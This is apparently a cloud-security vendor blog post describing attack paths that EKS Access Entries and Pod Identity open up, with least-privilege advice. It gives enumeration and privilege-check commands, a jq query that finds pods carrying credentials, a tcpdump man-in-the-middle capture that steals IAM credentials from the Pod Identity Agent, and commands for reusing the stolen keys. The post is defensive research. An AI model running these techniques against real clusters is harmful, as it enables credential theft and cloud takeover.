New attack vectors in EKS

We explore how advancements in EKS Access Entries and Pod Identity have opened new attack vectors and offer examples of how adversaries could exploit them.

9 minutes read

TL;DR 

AWS recently enhanced its managed Kubernetes service, EKS, with the introduction of EKS Access Entries and Policies, along with EKS Pod Identity. These advancements optimize the workflow for cluster administrators by enhancing the authentication and authorization process of IAM identities (users/roles) to EKS clusters, and also improving application authentication for accessing AWS resources such as S3 buckets, DynamoDB tables, and more.  

While these features offer significant benefits, they also potentially open up new avenues for exploitation by malicious actors. These actors could leverage these features to facilitate lateral movement between the cloud and the cluster, and vice versa. In the previous blog in this series, we analyzed the new features from the security best practices perspective. In this blog, we will delve into various tactics, techniques, and procedures (TTP) that adversaries might exploit, capitalizing on these new capabilities. 

Cloud to cluster 

Enumeration 

Consider a scenario where an IAM user or role is compromised by an attacker. With EKS Access Entries and Policies, the attacker could potentially scan and enumerate all clusters (using the new EKS authentication mode) accessible to the compromised identity.  

The necessary permissions for this operation would include eks:DescribeAccessEntry/eks:ListAssociatedAccessPolicies (or both), eks:ListClusters, and eks:DescribeCluster (likely granted if the identity has been authorized access to the cluster). 

Initially, the attacker would execute the cloud whoami command (sts get-caller-identity) to extract the compromised identity’s ARN. Then, for each discovered cluster, they would enumerate the access policies (using ListAssociatedAccessPolicies API) and the Kubernetes groups (using DescribeAccessEntry API) associated with the identity: 

aws eks list-associated-access-policies --cluster-name <cluster-name> --principal-arn <identity-arn> 

aws eks describe-access-entry --cluster-name <cluster-name> --principal-arn <identity-arn> 

This process can be automated to target all clusters in the account across all regions, allowing the attacker to determine the EKS cluster access level of the compromised identity, its privileges, and the Kubernetes groups it belongs to. 

If the ListAssociatedAccessPolicies API yields results, the attacker can quickly ascertain the Kubernetes permissions of the identity, as EKS access policies map to Kubernetes' built-in user-facing roles. The mappings are as follows: 

  • AmazonEKSClusterAdminPolicy maps to cluster-admin 

  • AmazonEKSAdminPolicy maps to admin 

  • AmazonEKSEditPolicy maps to edit 

  • AmazonEKSViewPolicy maps to view  

Conversely, if only the DescribeAccessEntry API returns results, further reconnaissance may be needed to understand the RBAC permissions of the assigned Kubernetes group. Note that permissions are additive. In the previous blog we have outlined the new permission calculation algorithm to aid with this exercise. 

In any case, a response from either API indicates that the compromised cloud identity has authorized access to the cluster, potentially opening up a pathway for lateral movement by the attacker. 

K8s privilege escalation 

There is potential for elevation of privileges on two levels — Cloud IAM and K8s RBAC. On a cloud level, IAM principal with the ability to create access entries and to associate access entry with high-privileged policy (e.g., with AmazonEKSClusterAdminPolicy or powerful group) can automatically acquire admin-level access in any accessible cluster. Thus, permissions like eks:CreateAccessEntry and eks:AssociateAccessPolicy should be treated as highly privileged. 

On the Kubernetes level, there are several potential escalation vectors. Let’s inspect the RBAC permissions associated with each of the built-in policies starting with the View policy. We can do this by running the aws eks associate-access-policy command on the same access entry with a different policy-arn parameter and subsequently checking for permissions with the auth can-i command, like so: 

> aws eks associate-access-policy --cluster-name pod-identity-test --principal-arn arn:aws:iam::XXXXXXXXXXX:user/eksuser --access-scope type=cluster --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSViewPolicy 
… 
>kubectl auth can-i --list 
Warning: the list may be incomplete: webhook authorizer does not support user rule resolution 
Resources  Non-Resource URLs   Resource Names   Verbs 
selfsubjectreviews.authentication.k8s.io   []  []  [create] 
selfsubjectaccessreviews.authorization.k8s.io   []   []   [create] 
… 

Unfortunately, auth can-i –-list does not show the full permission set, because the permissions for the eksuser are governed by the EKS webhook authorizer and thus invisible. Luckily, the Amazon team has provided the policy-to-RBAC mapping in this table, which we can complement with one-off specific auth can-i checks, like so: 

> kubectl auth can-i get pods 
yes 
> kubectl auth can-i get secrets 
no

We can learn a few things from this: 

1: As expected, the AmazonEKSViewPolicy is the most minimalistic — it can get/list/watch most of the resources without access to secrets. Executing into a pod requires creation of pods/exec resource and thus is unavailable. Note, however, that limiting a user to AmazonEKSViewPolicy does not completely protect from bad security designs and misconfiguration. For example, an exposed plaintext secret in a pod environment variable or in a main process command line parameter will be visible to a principle through the regular kubetl get pods -A -o json command and can serve as a starting point for privilege escalation chain within a cluster. Secret exposure is also common in logs, thus another potential escalation vector is log access. Here we can see that eksuser is allowed to read logs of a system pod: 

For the sake of simplicity, in our experiment, we didn’t scope the user to namespace and used –access-scope type=cluster). In real-world scenarios we recommend using namespace scope where possible. This could potentially minimize the chances of misconfiguration or secret disclosure. Our recommendation would be not to assign the AmazonEKSViewPolicy to non-trusted principals but to treat it as a meaningful privilege. For a non-trusted principal, we suggest using a more granular K8s RBAC model rather than EKS access policies — allowing you to grant just the minimum required permissions and preserve the principle of least privilege.

2: The AmazonEKSEditPolicy allows reading secrets and editing resources. This policy should not serve as a security boundary, as there are several possible privilege escalation paths to AmazonEKSClusterAdminPolicy. A related Datadog article mentions pod creations as an escalation vector. Other paths include exec-ing into the pod with a high-privilege service account and performing actions on its behalf, or writing into sensitive ConfigMaps (fluent-bit or node-problem-detector) to gain execution in the privileged context (see our previous research on managed cluster middleware).  We can verify the required privileges are present in the AmazonEKSEditPolicy: 

>kubectl auth can-i create pods/exec 
yes 
>kubectl auth can-i get secrets 
yes

Of course, with the ability to read secrets, the privilege escalation might not even be needed. 

3: The AmazonEKSClusterAdminPolicy is equivalent to the RBAC cluster-admin role with star permissions on everything.  

4: The AmazonEKSAdminPolicy is equivalent to the RBAC admin role and is somewhat restricted when it comes to modifying namespace config (cannot change resource quotas) or affecting other namespaces (cannot create ClusterRoleBindings to bind themselves to cluster-wide roles). It was designed to support namespace-based multi-tenancy, and you should use this policy with namespace scope.  

Access Entries API authentication vs. aws-config 

The implementation of EKS Access Entries significantly simplifies the authentication and authorization processes for IAM identities in EKS clusters. While this enhancement offers great benefits, it also expands the overall attack surface, subsequently increasing the potential for compromising EKS clusters. This underscores the critical importance of rigorously adhering to the principle of least privilege. 

Consider a scenario where an attacker compromises a cloud identity with administrative privileges. If an EKS cluster within the compromised account uses the ConfigMap method for authentication, the attacker's access to the cluster is contingent upon whether the compromised identity either created the cluster or was explicitly granted access via the aws-auth ConfigMap, regardless of its administrative privileges in the cloud. However, if the cluster utilizes the Access Entries API for authentication, the situation escalates. The attacker could potentially utilize the CreateAccessEntry cloud API to gain access to the cluster. Furthermore, by invoking the AssociateAccessPolicy cloud API, the attacker might assign themselves the AmazonEKSClusterAdminPolicy which is equivalent to the Kubernetes cluster-admin role, subsequently allowing the adversary to move laterally to the cluster and take it over. If an attacker doesn’t have AssociateAccessPolicy permission, but has CreateAccessEntry permission, another option is to map the IAM user to one of the existing powerful groups. However, this group should already exist and not start with systems:, eks:, or iam:.

Once in the cluster, an attacker can abuse the existing IRSA or Pod Identity permissions assigned to cluster pods. To find all the pods assigned EKS pod identity, one can run the following command: 

[cloudshell-user@ip-10-130-85-108 ~]$ kubectl get pods -o json | jq -r '.items[]|select(any(.spec.containers[].env[];.name=="AWS_CONTAINER_CREDENTIALS_FULL_URI"))|.metadata.name + "   " + .metadata.namespace + "   " + .spec.serviceAccount' | sort -u | uniq 
curl   default   default 
pod-full-bucket-access   default   full-access-sa 
pod-read-bucket-access   default   default 

When mapped to a role with enough privilege (can pod/exec or create pod with /var/lib/kubelet mapped), an attacker will be able to employ one of the traditional techniques to steal the identity tokens and use them for cloud resource access. Alternatively, an attacker can utilize the novel MitM stealing technique presented in the next section. In any case, even if an attacker already has the acquired permissions, they can use the acquired identities for repudiation. Forensics investigation will be complicated by the fact that suspicious activity has occurred across cloud and K8s logs, and both are needed to read the full picture. 

Cluster to cloud 

EKS Pod Identity introduces a new attack vector that can be abused to move laterally to the cloud domain, access cloud resources, and escalate privileges in the cloud. 

As AWS outlines in their blog, the EKS Pod Identity Agent — which operates as a DaemonSet on each worker node — exchanges a JWT token for temporary IAM credentials using the AssumeRoleForPodIdentity API. This token is mounted in pods that utilize a Kubernetes service account associated with an IAM role. Under the hood, a pod sends an HTTP GET request with an authorization header containing the JWT token to the local http://169.254.170.23/v1/credentials endpoint managed by the Pod Identity Agent, which then exchanges it for temporary IAM credentials and sends them back to the requesting pod. 

Man-in-the-Middle attack 

From an offensive security perspective, this means that a malicious actor who compromises a pod with a shared network namespace (i.e., pods with the hostNetwork flag enabled) could execute a “Man-in-the-Middle" (MitM) attack and intercept network traffic to/from the 169.254.170.23 endpoint. Consequently, they could capture temporary IAM credentials associated with an IAM role linked to any Kubernetes service account used by other pods on the same worker node where the compromised host-network-enabled pod is located. 

To illustrate this MitM attack, let’s assume we were able to compromise a pod in host network mode (i.e., the pod uses the network namespace of the host node). Let’s use tcpdump to intercept any networking traffic to/from the Pod Identity Agent (169.254.170.23) on any of the network interfaces on the host machine, and write the captured packets to a pcap file for further analysis: 

tcpdump -A -ni any -s0 "host 169.254.170.23" -w output.cap 

Let’s analyze the pcap file using Wireshark

We can identify two network packets that signify the request and response (in the 1st and 3rd rows, respectively). The first one represents the HTTP GET request originating from a pod (with the IP address of 172.31.15.77) to the Pod Identity Agent endpoint at 169.254.170.23. This pod is requesting the IAM role’s credentials associated with its service account, and notably, the authorization header containing the JWT token is present in plaintext: 

The response packet contains the IAM role’s credentials (AccessKeyId, SecretAccessKey, Token) that were generated by the Pod Identity Agent (in exchange for the JWT token): 

Using these credentials, we can now authenticate as the IAM role and execute cloud actions on behalf of it, subsequently allowing us to move laterally to the cloud and access cloud resources: 

export AWS_ACCESS_KEY_ID=”<AccessKeyId>” 
export AWS_SECRET_ACCESS_KEY=”<SecretAccessKey>” 
export AWS_SESSION_TOKEN=”<Token>”

IRSA vs Pod Identity 

While Pod Identity enhances and simplifies the experience of obtaining IAM permissions in the cloud, IRSA could prevent the risk of an MitM attack (like the one we outlined above). 

With IRSA, the IAM role ARN is set in the pod’s environment variable (AWS_ROLE_ARN), and together with the mounted JWT token, the pod assumes its associated IAM role directly using the AssumeRoleWithWebIdentity API. This approach prevents the risk of token or credentials sniffing within the cluster's network, since there's no need to send the token to an internal endpoint inside the cluster to exchange for IAM credentials. 

Conclusion 

In this, the second blog post in our series on new EKS features, we outlined new TTP opportunities in AWS's EKS, focusing on EKS Access Entries and Pod Identity. We explored how these advancements in authentication and authorization also open up new avenues for potential attacks. We looked at the possible exploitation of these features by adversaries, highlighting the increased attack surface and emphasizing the importance of the principle of least privilege

Continue reading

Get a personalized demo

Ready to see Wiz in action?

“Best User Experience I have ever seen, provides full visibility to cloud workloads.”
David EstlickCISO
“Wiz provides a single pane of glass to see what is going on in our cloud environments.”
Adam FletcherChief Security Officer
“We know that if Wiz identifies something as critical, it actually is.”
Greg PoniatowskiHead of Threat and Vulnerability Management